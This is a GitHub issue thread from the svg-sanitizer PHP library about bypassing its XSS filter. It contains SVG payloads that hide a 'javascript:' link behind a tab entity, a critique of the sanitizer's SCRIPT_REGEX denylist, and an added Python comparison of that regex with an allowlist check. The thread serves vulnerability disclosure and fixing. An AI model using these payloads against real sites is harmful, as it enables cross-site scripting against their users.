darylldoyle / svg-sanitizer

A PHP SVG/XML Sanitizer
GNU General Public License v2.0

XSS bypass using entities and tab #31

Closed dinhbaouit closed 4 years ago

dinhbaouit commented 4 years ago

Using payload below to bypass XSS filter:

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(document.domain)">
    <circle cx="0" cy="0" r="300"/>
  </a>
</svg>

Video POC: https://www.youtube.com/watch?v=MIAiX4gkp6U&feature=youtu.be

darylldoyle commented 4 years ago

Thanks @dinhbaouit

I'm currently working on a fix for this that I'll release later today!

darylldoyle commented 4 years ago

@dinhbaouit thanks again for bringing this to my attention! I've tagged the latest release with the updated fix for this and will proceed to get the plugins etc updated.

dinhbaouit commented 4 years ago

OK, Thanks sir

ohader commented 4 years ago

@dinhbaouit 🤦‍♀️ → https://en.wikipedia.org/wiki/Responsible_disclosure & https://cheatsheetseries.owasp.org/cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html

dinhbaouit commented 4 years ago

Sorry sir, I will delete it.

mbrodala commented 4 years ago

@darylldoyle You should add a section about how to get in touch for security issues to your README to prevent public reports like this.

dinhbaouit commented 4 years ago

Hi, I see the fix can still be bypassed with a new payload:

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascrip&#9;t:alert('0xd0ff9')">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg>

Why don't you use whitelist to sanitize like xlink:href?

dinhbaouit commented 4 years ago

This regex: const SCRIPT_REGEX = '/(?:\w+script|data)(?:\s)?:/xi'; isn't safe; \s can be put anywhere in the "script" string, like this: s\sc\sr\si\sp\st

darylldoyle commented 4 years ago

@dinhbaouit whilst you're correct that this does get through the sanitiser in a way, I'm struggling to get it to actually execute. The spacing in the middle of the javascript keyword seems to stop browsers from picking up and executing the script:

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascrip    t:alert('0xd0ff9')">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg>

The above is what's left. If you can show me a way to get this to execute in a browser, as the first bypass you posted did, then I'll be happy to look; otherwise, I'll leave this one alone as it's not causing any real issues.

dinhbaouit commented 4 years ago

POC for the new version of the WordPress plugin (1.9.5): entities are not converted to raw data; they will be HTML-encoded. https://www.youtube.com/watch?v=hnQA2hc-4_k&feature=youtu.be
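As an added example (not code from this thread or from svg-sanitizer), the SCRIPT_REGEX check quoted above re-expressed in Python, beside an allowlist check that decodes entities and strips tab/LF/CR the way a browser's URL parser does before looking at the scheme, run over the three hrefs posted in this issue. ALLOWED_SCHEMES and all function names are assumptions for the example.

```python
import html
import re

# The check discussed in this issue, written in PHP as
#   const SCRIPT_REGEX = '/(?:\w+script|data)(?:\s)?:/xi';
# re-expressed for Python's re module (x = verbose, i = case-insensitive).
SCRIPT_REGEX = re.compile(r"(?:\w+script|data)(?:\s)?:", re.I | re.X)

# Allowlist of URL schemes an <a href> inside an SVG may use (assumption for this example).
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# The WHATWG URL parser drops ASCII tab/LF/CR anywhere and trims C0 controls and space at both ends.
_STRIPPED_INNER = re.compile(r"[\t\n\r]")
_TRIMMED_EDGES = "".join(chr(c) for c in range(0x21))

def regex_blocks(href: str) -> bool:
    """Denylist check on the raw attribute text: True means the original regex rejects it."""
    return SCRIPT_REGEX.search(href) is not None

def normalize_href(href: str) -> str:
    """Approximate what the browser sees: decode entities, then strip URL-ignored characters."""
    decoded = html.unescape(href)  # '&#9;' becomes a TAB, which is what the reported bypass relies on
    return _STRIPPED_INNER.sub("", decoded).strip(_TRIMMED_EDGES)

def allowlist_blocks(href: str) -> bool:
    """Allowlist check on the normalized value: True means the href is rejected."""
    # Text before the first ':' that is not preceded by '/', '?' or '#' is treated as the scheme,
    # so 'javascrip    t:' is rejected even though browsers may not execute it (conservative).
    m = re.match(r"^([^/?#:]*):", normalize_href(href))
    if m is None:
        return False  # no scheme: relative URL or fragment, allowed
    return m.group(1).lower() not in ALLOWED_SCHEMES

# Constructed inputs: the three hrefs posted in this issue plus two benign links.
SAMPLE_HREFS = {
    "entity before colon": "javascript&#9;:alert(document.domain)",
    "entity inside keyword": "javascrip&#9;t:alert('0xd0ff9')",
    "spaces inside keyword": "javascrip    t:alert('0xd0ff9')",
    "plain https": "https://example.com/a:b",
    "relative path": "docs/page.html#top",
}

def compare_checks() -> dict:
    """Map each sample name to (blocked_by_regex, blocked_by_allowlist)."""
    return {name: (regex_blocks(h), allowlist_blocks(h)) for name, h in SAMPLE_HREFS.items()}

if __name__ == "__main__":
    for name, (old, new) in compare_checks().items():
        print(f"{name:22} regex={'block' if old else 'pass'}  allowlist={'block' if new else 'pass'}")
```

The regex passes all three posted hrefs because it only tolerates whitespace between the scheme and the colon and never decodes entities; the allowlist check rejects them while leaving the two benign links untouched.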